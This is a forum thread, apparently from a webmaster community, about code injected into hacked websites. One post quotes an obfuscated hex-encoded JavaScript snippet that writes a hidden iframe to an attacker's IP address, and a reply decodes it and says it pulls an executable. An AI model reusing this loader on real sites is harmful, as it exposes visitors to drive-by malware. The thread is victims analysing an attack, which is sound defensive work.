![]() |
Hackers injecting code into sites
How do they do this and does anybody know what this script actually does, is it hijacking traffic?
Code:
<script> var s='3C696672616D65207372633D22687474703A2F2F3230332E3132312E36392E392F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o='; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); ; o=o+c+s.substr(i,2);} document.write(unescape(o)); </script> |
I got my shit jacked ....but caught it early.
It was doing some crazy pop-up that went to AFF. |
Hackers should all be shot.
|
Quote:
|
That translates to this:
<iframe src="http://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe> Therefore, it's loading an iframe onto your page and load the contents of that url into it. |
The funny thing with this one is Firefox did not pick it up nor did the owners own browser so he did not know until somebody else told him that it was trying to install some java application onto his browser
|
Quote:
|
Quote:
I think its something to do with scripts not being turned on by default in FF but they are in ie... However that's what i heard. Im not stating it as absolute fact :) |
Quote:
|
Quote:
the script will affect firefox just the same as ie.. firefox comes with javascript turned on by default. and even if it didn't ,surfing without javascript would be almost useless so the iframe will be displayed on most browsers, whats in the iframe may only affect ie or may only affect firefox. |
Quote:
203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php This seems to be a popular subject today. Looks like quite a few have been hit.:( |
Quote:
|
Keep your network secure...
|
Quote:
I learned my lesson when they hacked my site and deleted it lol |
haha, matrix has you too ;)
|
Quote:
|
it is actually risky to try to find out what that code do!
|
Quote:
|
It's funny when you get that shit replicating through the whole network from a file that acts as a shell, and it's all automated. Russians pwn at these things.
|
All times are GMT -7. The time now is 02:44 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc